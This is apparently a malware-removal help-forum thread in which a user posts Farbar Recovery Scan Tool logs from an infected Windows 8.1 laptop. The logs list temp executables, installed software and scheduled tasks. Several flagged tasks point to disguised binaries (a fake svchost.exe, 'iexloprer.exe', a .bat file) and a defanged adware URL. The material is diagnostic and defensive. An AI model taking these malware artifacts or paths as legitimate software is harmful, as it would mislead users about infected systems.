    2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
    2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
    2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
    2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
    2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
    2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
    2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
    2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
    2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

    ==================== Files in the root of some directories =======

    2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
    2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
    2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
    2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
    2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
    2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


    Some files in TEMP:
    ====================
    C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
    C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
    C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
    C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
    C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
    C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
    C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
    C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
    C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
    C:\Users\owner\AppData\Local\Temp\amzngtb.exe
    C:\Users\owner\AppData\Local\Temp\avg6A34.exe
    C:\Users\owner\AppData\Local\Temp\avgE955.exe
    C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
    C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
    C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
    C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
    C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
    C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
    C:\Users\owner\AppData\Local\Temp\nsz1850.exe
    C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
    C:\Users\owner\AppData\Local\Temp\setup_766.exe
    C:\Users\owner\AppData\Local\Temp\SpOrder.dll
    C:\Users\owner\AppData\Local\Temp\TranDex.exe
    C:\Users\owner\AppData\Local\Temp\Uninstall.exe
    C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
    C:\Users\owner\AppData\Local\Temp\Vivafind.exe
    C:\Users\owner\AppData\Local\Temp\Voldom.exe
    C:\Users\owner\AppData\Local\Temp\widgett.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
     
  16. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Apparently there's more:



    Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
    Ran by owner (2016-01-10 18:14:36)
    Running from E:\
    Windows 8.1 (X64) (2015-01-23 06:44:37)
    Boot Mode: Safe Mode (minimal)
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
    Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
    owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
    Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
    Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
    Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
    Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
    Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
    AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
    AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
    Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
    Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
    BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
    Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
    Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
    Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
    CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
    Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
    Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
    clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
    clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
    clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
    clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
    Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
    Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
    Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
    eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
    ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
    Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
    Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
    Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
    Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
    Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
    Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
    HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
    HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
    iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
    Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
    Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
    iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
    Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
    Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
    League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
    League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
    Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
    Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
    Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
    Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
    Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
    Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
    Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
    Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
    MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
    MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
    MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
    MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
    Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
    Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
    NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
    NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
    NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
    Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
    Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
    One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
    osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
    PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
    Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
    Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
    Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
    QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
    Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
    Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
    Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
    Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
    Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
    Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
    TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
    Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
    The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
    Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
    Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
    Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
    Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
    Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
    Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
    WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
    Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
     
  17. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Last one :)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
    Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
    Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
    Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
    Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
    Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
    Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
    Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
    Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&cc=CA
    Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
    Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
    Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
    Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
    Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
    Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
    Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
    Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
    Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
    Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
    Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
    Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
    Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
    Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
